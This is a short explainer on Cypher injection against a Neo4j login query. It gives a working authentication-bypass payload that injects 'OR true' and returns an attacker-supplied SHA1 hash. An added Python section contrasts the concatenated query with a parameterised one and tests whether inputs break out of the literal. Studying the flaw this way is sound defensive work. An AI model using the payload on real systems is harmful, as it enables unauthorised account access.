Neo4j
Graph Database Management System
Cypher
Cypher is a specialized query language created for working with graph databases, primarily Neo4j. It is designed to express graph patterns and relationships in a clear, readable way.
Cypher Injection in Neo4j Query via Username Field
Vulnerable Query Example
MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = ''' return h.value as hash
Knowing the query structure, an attacker can manipulate the Cypher query to bypass authentication by injecting a condition that always evaluates to true.
Bypass Payload Example
MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = '' OR true return "<hash>" as hash; // return h.value as hash
Password Hash Matching
The application likely compares the returned hash with the SHA1 hash of the password entered in the login form. To successfully bypass authentication, the attacker must replace <hash> with the SHA1 hash of the password they provide in the password field:
' OR true return "0f1aae8b8398c20f81e1c36e349a7880c9234c63" as hash; //
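Added example (not from the original page; it assumes a Python backend, which the page does not state): the page's query built by concatenation next to its parameterised form, with a small scanner that checks whether a username stays inside the quoted string literal. The function names and sample usernames are constructed for illustration.

```python
# Added example: the query text comes from the page; the Python wrapper is an assumption.
PREFIX = "MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = '"
SUFFIX = "' return h.value as hash"

def vulnerable_query(username: str) -> str:
    """Concatenation: the username becomes part of the Cypher text itself."""
    return PREFIX + username + SUFFIX

def safe_query(username: str) -> tuple[str, dict]:
    """Parameterised form: the text is constant and the value travels separately.
    With the official neo4j Python driver the pair is passed as session.run(text, params)."""
    text = ("MATCH (u:USER) -[:SECRET]-> (h:SHA1) "
            "WHERE u.name = $name RETURN h.value AS hash")
    return text, {"name": username}

def literal_end(query: str, start: int) -> int:
    """Index of the quote that closes the literal opened at query[start], or -1."""
    quote = query[start]
    i = start + 1
    while i < len(query):
        if query[i] == "\\":      # backslash escapes the next character in Cypher
            i += 2
            continue
        if query[i] == quote:
            return i
        i += 1
    return -1

def input_changes_structure(username: str) -> bool:
    """True when the username ends the string literal anywhere other than
    at the closing quote the developer wrote, i.e. it alters the query."""
    query = vulnerable_query(username)
    opening = len(PREFIX) - 1                     # the quote at the end of PREFIX
    intended_close = len(PREFIX) + len(username)  # the quote at the start of SUFFIX
    return literal_end(query, opening) != intended_close

# Constructed sample inputs; the last one is the payload shown on this page.
SAMPLES = ["alice", "O'Brien", "bob\\", '\' OR true return "<hash>" as hash; //']

if __name__ == "__main__":
    for name in SAMPLES:
        print(f"{name!r:48} changes structure: {input_changes_structure(name)}")
        print("    parameterised text:", safe_query(name)[0])
```

A benign name containing an apostrophe and a trailing backslash both alter the concatenated query as well, while the parameterised text is identical for every input.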